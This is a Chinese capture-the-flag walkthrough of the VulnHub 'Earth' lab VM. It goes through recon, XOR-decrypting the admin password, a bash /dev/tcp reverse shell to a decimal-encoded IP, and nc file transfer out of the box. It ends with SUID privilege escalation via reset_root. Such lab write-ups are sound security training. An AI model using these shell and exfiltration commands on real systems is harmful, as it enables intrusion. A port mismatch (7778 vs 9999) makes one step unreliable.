一,靶机介绍
下载地址
https://www.vulnhub.com/entry/the-planets-earth,755/#download
描述
Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.
二,解题步骤
1,确定 ip 地址
netdiscover -r 192.168.133.0/24
得到靶机地址:192.168.133.130
2,扫描靶机端口
nmap -A -sS -sC -p- 192.168.133.130
注意到两个 DNS 域名:earth.local、terratest.earth.local
3,扫描 web 目录
将上面两个域名配置在本地 hosts,然后分别扫描 http 和 https 的 web 目录
dirb http://terratest.earth.local
dirb https://terratest.earth.local
dirb http://earth.local
dirb https://earth.local
主要有以下内容:
http://terratest.earth.local/admin (CODE:301|SIZE:0)
https://terratest.earth.local/index.html (CODE:200|SIZE:26)
https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)
4,找 FLAG
先访问https://terratest.earth.local/robots.txt
最后一个应该是特有的文件,猜测是一个 txt 后缀,然后访问https://terratest.earth.local/testingnotes.txt看到以下内容
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
复制代码
todo 里的内容可以忽略,上面几行主要告诉了以下几点
使用异或方式加密
https://terratest.earth.local/testdata.txt 里面是密钥
http://terratest.earth.local/admin 这个管理页面的用户名是 terra
这时的思路是应该是可以根据这几点信息来找到管理页面 terra 账户的密码,然后登录管理页面
打开http://earth.local主页,发现有一个消息发送的页面:
下面 previous message 里有 3 条消息,应该是之前使用密钥加密之后的消息(上面的几条消息可以忽略,是我测试时点 send message 产生的,原靶机里只有最后 3 条)。
因为使用的是异或加密,所以我们可以通过前面的 testdata.txt 里的密钥来还原加密之前的内容,python 脚本(meesageKey 是把 testdata 里的内容转成 16 进制后的结果):
sendMessage = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d403714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b452402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
messageKey = "4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c696665726174696f6e206f6620616e6165726f62696320616e642c206c617465722c206165726f626963206f7267616e69736d732e20536f6d652067656f6c6f676963616c2065766964656e636520696e646963617465732074686174206c696665206d617920686176652061726973656e206173206561726c7920617320342e312062696c6c696f6e2079656172732061676f2e4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c696665726174696f6e206f6620616e6165726f62696320616e642c206c617465722c206165726f626963206f7267616e69736d732e20536f6d652067656f6c6f676963616c2065766964656e636520696e646963617465732074686174206c696665206d617920686176652061726973656e206173206561726c7920617320342e312062696c6c696f6e2079656172732061676f2e"
c = ""
i = 0
while i < 1612:
print(int(sendMessage[i] + sendMessage[i+1], 16) ^ int(messageKey[i] + messageKey[i+1], 16))
c += str(chr(int(sendMessage[i] + sendMessage[i+1], 16) ^ int(messageKey[i] + messageKey[i+1], 16)))
i = i + 2
print(c)
复制代码
最终得到加密之前的内容如下,观察到后面一部分有重复的片段:earthclimatechangebad4humans
http://terratest.earth.local/admin,登录成功,进入一个可以执行系统命令的页面
通过这个页面先拿一个反弹 shell
在本地监听 7777 端口:nc -nvlp 7777
在 admin 页面执行反弹命令:bash -i >& /dev/tcp/3232269696/7777 0>&1
(中间的 3232269696 是本地的 ip 转换成 10 进制)
本地 7777 端口接收到靶机的 bash:
模糊搜索 flag:find / -name '*flag*'
找到第一个 flag:/var/earth_web/user_flag.txt
根据靶机描述,第二个 flag 需要 root 权限
查找具有 suid 权限的文件:find / -perm -u=s
有一个 reset_root 有点可以,尝试执行:/usr/bin/reset_root
提示 RESET FAILED,接着尝试本地调试这个文件,看看为什么失败。
本地监听另一个端口来保存 reset_root 文件:nc -nvlp 7778 > ~/Desktop/reset_root
靶机上将 reset_root 文件内容发送到本地的 7778 端口:nc 192.168.133.128 9999 < /usr/bin/reset_root
本地已将 reset_root 文件获取到,使用 strace 执行:strace ~/Desktop/reset_root,发现有三个文件不存在,导致系统调用返回-1,在靶机上看确实没有这三个文件。
在靶机上创建这三个文件,再次执行 reset_root。提示 root 用户密码被重置为 Earth
拿到了 root 权限,就简单了。登录到靶机。再次模糊搜索:find / -name '*flag*'
第二个 flag 成功找到!
评论